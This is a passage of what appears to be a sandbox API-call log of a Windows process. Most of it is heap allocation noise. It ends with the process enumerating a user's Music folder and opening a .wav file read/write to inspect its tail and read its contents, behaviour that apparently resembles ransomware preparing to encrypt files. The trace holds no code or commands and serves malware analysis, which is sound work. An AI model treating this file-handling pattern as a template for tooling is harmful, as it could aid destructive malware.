hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.401] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.401] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0235.401] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.401] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0235.401] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.401] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.401] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.401] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.401] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0235.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0235.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.403] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.403] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.403] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.403] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.403] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.403] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.403] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.403] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.403] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.403] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.403] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.404] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.404] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.404] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.404] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.404] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0235.404] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.404] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0235.404] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.404] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.404] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.404] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.404] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.404] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.404] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.404] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0235.404] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.404] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0235.404] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.404] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.404] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0235.404] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.404] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.404] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.404] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0235.405] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.405] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.405] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.405] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.405] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.405] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.405] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.405] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.405] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.405] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.405] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.405] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.405] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0235.405] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.405] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0235.405] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.405] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.405] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.405] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.405] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.405] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.405] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.405] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.405] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.405] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.406] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.406] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.406] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.406] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.406] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.406] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.406] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.406] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.406] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.406] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.406] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.406] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0235.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0235.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0235.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0235.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0235.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0235.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.409] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\") returned="-wYl9Wxaf_FQLu8dRQB5\\" [0235.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0235.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba678 [0235.409] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\") returned="Xb4anhaDsw_nEnBFeS\\" [0235.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5808 [0235.410] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0235.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325cc80 [0235.410] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0235.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0235.410] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0235.410] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0235.410] PathFindFileNameW (pszPath="") returned="" [0235.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.410] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3766b590, ftCreationTime.dwHighDateTime=0x1d5da29, ftLastAccessTime.dwLowDateTime=0x78512300, ftLastAccessTime.dwHighDateTime=0x1d5e5f1, ftLastWriteTime.dwLowDateTime=0x78512300, ftLastWriteTime.dwHighDateTime=0x1d5e5f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0235.413] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3766b590, ftCreationTime.dwHighDateTime=0x1d5da29, ftLastAccessTime.dwLowDateTime=0x78512300, ftLastAccessTime.dwHighDateTime=0x1d5e5f1, ftLastWriteTime.dwLowDateTime=0x78512300, ftLastWriteTime.dwHighDateTime=0x1d5e5f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0235.413] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c620f0, ftCreationTime.dwHighDateTime=0x1d5e1d4, ftLastAccessTime.dwLowDateTime=0xcc2aaec0, ftLastAccessTime.dwHighDateTime=0x1d5e3b6, ftLastWriteTime.dwLowDateTime=0xcc2aaec0, ftLastWriteTime.dwHighDateTime=0x1d5e3b6, nFileSizeHigh=0x0, nFileSizeLow=0x2381, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8zc5gaDVdZR.wav", cAlternateFileName="8ZC5GA~1.WAV")) returned 1 [0235.413] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.413] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xee) returned 0x31a4298 [0235.413] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\8zc5gaDVdZR.wav") returned=".wav" [0235.413] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\8zc5gaDVdZR.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\-wyl9wxaf_fqlu8drqb5\\8zc5gadvdzr.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.413] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=9089) returned 1 [0235.413] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.416] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x235b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.416] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.418] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.418] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: 